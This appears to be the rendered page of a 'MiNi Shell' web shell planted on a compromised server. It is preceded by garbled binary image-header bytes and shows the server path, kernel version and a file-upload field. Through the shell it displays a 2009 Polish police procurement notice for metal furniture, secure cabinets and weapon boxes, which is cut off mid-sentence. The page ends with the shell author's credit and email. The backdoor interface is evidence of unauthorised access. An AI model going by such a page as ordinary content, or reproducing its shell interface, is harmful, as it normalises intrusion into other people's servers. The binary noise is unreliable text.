JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091020/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091020/183067-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: Zakup wraz z dostawą mebli metalowych dla KPP Sulęcin oraz wyremontowanych jednostek Policji woj. lubuskiego</b><br>
<b>Numer ogłoszenia: 183067 - 2009; data zamieszczenia: 20.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Kwiatowa 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7211420, faks 095 7211455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.policja.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: policja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą mebli metalowych dla KPP Sulęcin oraz wyremontowanych jednostek Policji woj. lubuskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES PRZEDMIOTU ZAMÓWIENIA :
1)zakup wraz z dostawą fabrycznie nowych mebli, pochodzących z bieżącej produkcji wraz z montażem regałów i szaf BHP oraz ustawieniem mebli we wskazanym przez Zamawiającego miejscu dostawy.
2)przedmiot zamówienia dotyczy m.in.: szaf metalowych jedno i dwudrzwiowych z klasami tajności A i B, szaf i szafek kartotekowych, regałów magazynowych, szaf BHP, szafek na klucze, kasetek metalowych na broń. Rodzaj zamawianych mebli, ilość oraz szczegółowy opis techniczny i wskazanie miejsce dostawy zawarte są w Formularzu Ofertowym (zał. Nr 1 do SIWZ dostępny na stronie www.lubuska.policja.gov.pl)
3)szafy metalowe jedno i dwudrzwiowe z klasami tajności A i B oraz kasetki metalowe na broń, muszą posiadać Atest Instytutu Mechaniki Precyzyjnej.
4)Szafy metalowe jedno i dwudrzwiowe z klasami tajności A i B musza posiadać tabliczki wydane przez jednostkę certyfikująca, zamontowane na wewnętrznej, górnej stronie drzwi, zawierające następujące dane: nazwę wyrobu, nazwę i kod identyfikacyjny producenta, typ i numer modelu, numer fabryczny, rok produkcji, klasę wyrobu, numer certyfikatu, masę
5)Przy szafach metalowych (nie dotyczy szaf BHP) dopuszcza się wahanie (+/-) 50 mm w wysokości, szerokości i głębokości.
Zamówienie przewiduje prawo opcji zgodnie z art. 34 ust. 5 ustawy P.z.p.
Zamawiający wymaga aby Wykonawca udzielił na przedmiot zamówienia min. 36 m-cy gwarancji od dnia ostatecznego odbioru mebli, przy czym udzielona gwarancja jakości nie może być krótsza i mniej korzystna dla Zamawiającego niż gwarancja jakości producenta. Termin rękojmi za wady fizyczne i prawne w przedmiocie zamówienia ustala się na okres 12 miesięcy.
Termin płatności - 30 dni kalendarzowych od dnia dostarczenia faktury VAT do siedziby Zamawiającego. 
Szczegółowy opis przedmiotu zamówienia- wymagania techniczne jakie musi spełniać zaoferowany przez Wykonawcę przedmiot zamówienia zostały opisane w SIWZ  i jej załącznikach (SIWZ dostępna na stronie www.lubuska.policja.gov.pl  - od momentu publikacji ogłoszenia w Biuletynie Zamówień Publicznych.)
Szczegóły dotyczące realizacji przedmiotu zamówienia, płatności, gwarancji, reklamacji itp. Zawiera Projekt Umowy - zał. nr 6 do SIWZ dostępny na stronie www.lubuska.policja.gov.pl
Miejsce dostaw: Wykonawca (za pośrednictwem i w porozumieniu z Komendą Wojewódzką Policji w Gorzowie Wlkp.) dostarczy przedmiot umowy, na własny koszt i ryzyko do : 
-Komendy Wojewódzkiej Policji w Gorzowie Wlkp.
-Komendy Powiatowej Policji w Sulęcinie, ul. Szpitalna
-Komisariatu Policji w Drezdenku, ul. Niepodległości 27 a.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.21.00-7, 39.14.13.00-5, 39.13.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Przystępując do przetargu Wykonawca zobowiązany jest do wniesienia wadium przed upływem terminu składania ofert.
Kwota wadium wynosi 5.000,00 PLN (słownie: pięć tysięcy złotych 00/100) 
2.Wadium może być wnoszone w formach określonych w art. 45 ust 6 ustawy.
3.Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.  
4.Wadium wnoszone w formie pieniężnej należy wpłacać na rachunek:
PKO S.A. O/Gorzów 67 1240 6843 1111 0000 4987 8521
do oferty należy załączyć kserokopię przelewu, która musi być potwierdzona przez bank z wyjątkiem bankowości elektronicznej.
5.Wadium wnoszone w formie poręczenia lub gwarancji - oryginał dokumentu należy złożyć w kasie KWP, ul. Kwiatowa 10, Gorzów Wlkp.,  za pośrednictwem Sekcji ds. Zamówień Publicznych gdzie należy odebrać zlecenie przyjęcia dokumentu wadialnego do kasy. Kserokopię dokumentu wadium należy dołączyć do składanej oferty, potwierdzoną za zgodność z oryginałem wraz z podpisem lub parafką Wykonawcy.
6.Zwrot wadium następuje zgodnie z art. 46 ust. 1,2,3 i 4 ustawy.
7.Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli ( art. 46 ust.4a oraz ust.5 pkt 1, 2 i 3 ustawy): 
a)Wykonawca, którego oferta została wybrana odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)Jeżeli Wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodnił, że wynika to z przyczyn nieleżących po jego stronie. ( art. 46 ust.4a ustawy)
9.W przypadku Wykonawców występujących wspólnie :
a)jeżeli wadium jest wnoszone w formie pieniężnej nie ma znaczenia, który z członków konsorcjum dokonuje przelewu środków pieniężnych na konto Zamawiającego.
b)Jeżeli wadium jest wnoszone w formie gwarancji - w jej treści muszą być wskazani wszyscy występujący wspólnie Wykonawcy oraz  muszą być zawarte zapisy stwierdzające, że gwarant zapłaci określoną kwotę w przypadku, jeżeli którykolwiek z wykonawców wspólnie ubiegających się o udzielenie zamówienia odmówi podpisania umowy  lub też zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie któregokolwiek z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
10.Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ SPOSOBU  DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW (art. 22 ust. 1, art. 24 ust 1 i 2 ustawy)
1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) warunek musi być spełniony przez każdego z członków Konsorcjum osobno.
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia; w szczególności Wykonawca musi wykazać się należytym zrealizowaniem w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie min. 2 jednorazowych (wynikających z jednej umowy każda) dostaw odpowiadających rodzajem przedmiotowi zamówienia i wartością min. 130.000,00 PLN brutto każda. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) warunek może  być wspólnie spełniony przez  członków Konsorcjum. 
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) warunek może  być wspólnie spełniony przez  członków Konsorcjum. 
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
2.Z postępowania o udzielenie zamówienia wyklucza się Wykonawców zgodnie z wymaganiami  art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
3.Ocena spełnienia warunków udziału w postępowaniu będzie odbywała się na podstawie złożonych przez Wykonawcę dokumentów potwierdzających spełnianie postawionych warunków - druk ZP-17 Informacja o spełnianiu przez wykonawców warunków udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego - wzór zgodnie z zał. nr 3 (Druki dodatkowe załączone do protokołu postępowania o udzielenie zamówienia) do Rozporządzenia Prezesa Rady Ministrów z dnia 24 października 2007r. w sprawie protokołu postępowania o udzielenie zamówienia publicznego. Wszystkie dokumenty jakie Zamawiający wymaga na potwierdzenie spełniania warunków udziału w postępowaniu są wymienione w pkt XII SIWZ.
4.Przedsiębiorców prowadzących działalność gospodarczą w formie spółki cywilnej należy traktować jako wykonawców wspólnie ubiegających się o udzielenie zamówienia (wyrok ZA UZP/ZO/0-1089/05)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> INFORMACJA O OŚWIADCZENIACH I DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU (art. 25 i 26 ustawy)
1.Na potwierdzenie warunków udziału w postępowaniu Wykonawca zobowiązany jest złożyć:
a)oświadczenie, że Wykonawca spełnia warunki art. 22 ust. 1 ustawy i nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy (wzór - załącznik nr 2 do SIWZ). W przypadku Wykonawców występujących wspólnie w/w dokument składa każdy z Wykonawców.
b)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do rejestru działalności gospodarczej, potwierdzające, że przedmiot działania wykonawcy, obejmuje zakres niezbędny do wykonania zamówienia. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku Wykonawców występujących wspólnie, w/w dokumenty składa każdy z Wykonawców;
c)Wykaz wykonanych dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów (np. listów referencyjnych)  potwierdzających należyte wykonanie tych dostaw (z dokumentów musi wynikać że Wykonawca spełnia warunek postawiony przez Zamawiającego w  pkt XI ppkt 1 lit b SIWZ) W przypadku Wykonawców występujących wspólnie, ze złożonych dokumentów musi wynikać, że wspólnie spełniają ten warunek (wzór zał. nr 3 do SIWZ);
2.Wykonawcy zagraniczni: Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. XII ppkt. 1 lit. b SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty, o których mowa (Wykonawcy zagraniczni) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
3.Na potwierdzenie spełniania przez oferowane dostawy wymagań określonych przez Zamawiającego w SIWZ Wykonawca musi załączyć o oferty: 
Oświadczenie (wzór - zał. nr 4 do SIWZ)  o posiadaniu na oferowane szafy metalowe (jedno i dwudrzwiowe) z klasami tajności A i B oraz kasetki metalowe na broń- Atestu Instytutu Mechaniki Precyzyjnej, o którym mowa w pkt  III pkt 3 ppkt.3 SIWZ oraz o tym, że oferowane szafy metalowe (jedno i dwudrzwiowe) z klasami tajności A i B posiadają tabliczkę o której mowa w pkt III pkt 3 ppkt. 4 SIWZ. Kopię Atestu wybrany Wykonawca będzie musiał przekazać Zamawiającemu przy dostawie;
4.Ponadto Wykonawca musi załączyć do oferty:
a)prawidłowo wypełniony i podpisany przez Wykonawcę formularz ofertowy (załącznik nr 1 do SIWZ).
b)upoważnienie lub pełnomocnictwo (w formie oryginału lub kopii poświadczonej za zgodność  z oryginałem przez notariusza -wyrok SO w Warszawie - SYGN. AKT V CA 85/07), określające zakres czynności do których jest umocowany;
c)oświadczenie o podwykonawcach, jeżeli Wykonawca przewiduje ich udział w realizacji zadania( załącznik nr 5 do SIWZ);
d)projekt umowy, podpisany lub zaparafowany przez Wykonawcę, (załącznik nr 6 do SIWZ);
e)W przypadku złożenia oferty przez Spółkę Cywilną należy załączyć oświadczenie o woli współpracy Wykonawców wspólnie składających ofertę.
f)oświadczenie o woli współpracy Wykonawców wspólnie składających ofertę, ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego (wyznaczenie lidera). W przypadku Wykonawców występujących wspólnie zastosowanie maja przepisy ustawy zawarte w art. 23 ust. 1-4 ustawy. 
5.Wszystkie wymagane dokumenty muszą być dostarczone w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
6.Jeżeli złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości Zamawiający może żądać przedstawienia oryginału lub kopii notarialnie poświadczonej. 
7.W przypadku, kiedy ofertę składają Wykonawcy występujący wspólnie (konsorcjum), oferta oraz wszystkie dokumenty wymienione w pkt. XII muszą być podpisane przez upoważnionego przedstawiciela / lidera konsorcjum.
8.Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę jego podpisem.
9.Brak  wymaganych w pkt XII ppkt 1 i 2 SIWZ dokumentów lub złożenie ich w niewłaściwej formie spowoduje wykluczenie Wykonawcy z postępowania o udzielenie zamówienia. (zgodnie z art.24 ust 2 pkt 3 ustawy - po wyczerpaniu możliwości uzupełnienia dokumentów lub wyjaśnienia treści dokumentów na podst. art. 26 ust. 3 i 4  oraz art. 87 ust. 2 ustawy).
10.Brak wymaganych w pkt XII ppkt 3 i ppkt. 4 lit. b SIWZ dokumentów lub złożenie ich w niewłaściwej formie spowoduje odrzucenie oferty Wykonawcy (zgodnie z art. 89 ustawy -po wyczerpaniu możliwości wynikających z art. 26 ust. 3 i 4 ustawy).
11.Brak wymaganych w pkt XII ppkt 4 lit. a, c, d, e, f  SIWZ dokumentów lub złożenie ich w niewłaściwej formie spowoduje odrzucenie oferty Wykonawcy (zgodnie z art. 89 ustawy, po wyczerpaniu możliwości wynikających z art. 87 ust. 1 i 2 ustawy).
12.Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
13.Jeżeli oferta Wykonawców występujących wspólnie (konsorcjum/Spółka Cywilna) zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców, w przypadku Przedsiębiorców prowadzących działalność w formie Spółki Cywilnej - umowę Spółki.
14.Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, oświadczeń itp.) mających wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy z przetargu na każdym jego etapie, zgodnie z dyspozycją art.24 ust.2 pkt.2 Ustawy P.z.p. Osoba lub osoby składające ofertę ponoszą pełną odpowiedzialność za treść złożonego oświadczenia woli na zasadach określonych w art. 297 §1 Kodeksu Karnego
15.Wszystkie miejsca, w których Wykonawca naniósł zmiany muszą być parafowane przez osobę podpisująca ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubuska.policja.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji, ul. Kwiatowa 10, 66-400 Gorzów Wlkp. Sekcja ds. Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2009 godzina 11:00, miejsce: Komenda Wojewódzka Policji, ul. Kwiatowa 10, 66-400 Gorzów Wlkp. Sekcja ds. Zamówień Publicznych.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy finansowania projektu ze środków unii europejskiej. Postępowanie o udzielenie zamówienia z zastrzeżeniem wyjątków określonych w ustawie prowadzi się w formie pisemnej (art.9 ust.1 ustawy P.z.p.) w języku polskim. Wszelkie zapytania dotyczące postępowania o udzielenie zamówienia należy kierować do Sekcji ds. Zamówień Publicznych na fax nr 095/7211435 lub email:
kwp_gorzow.zamowienia@lubuska.policja.gov.pl lub na adres: Komenda Wojewódzka Policji Sekcja ds. Zamówień Publicznych ul. Kwiatowa 10; 66-400 Gorzów Wlkp. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SIWZ zgodnie z art. 38 ustawy. Wszelkie zapytania do SIWZ należy do Zamawiającego kierować w formie pisemnej. Zamawiający nie

Creat By MiNi SheLL
Email: jattceo@gmail.com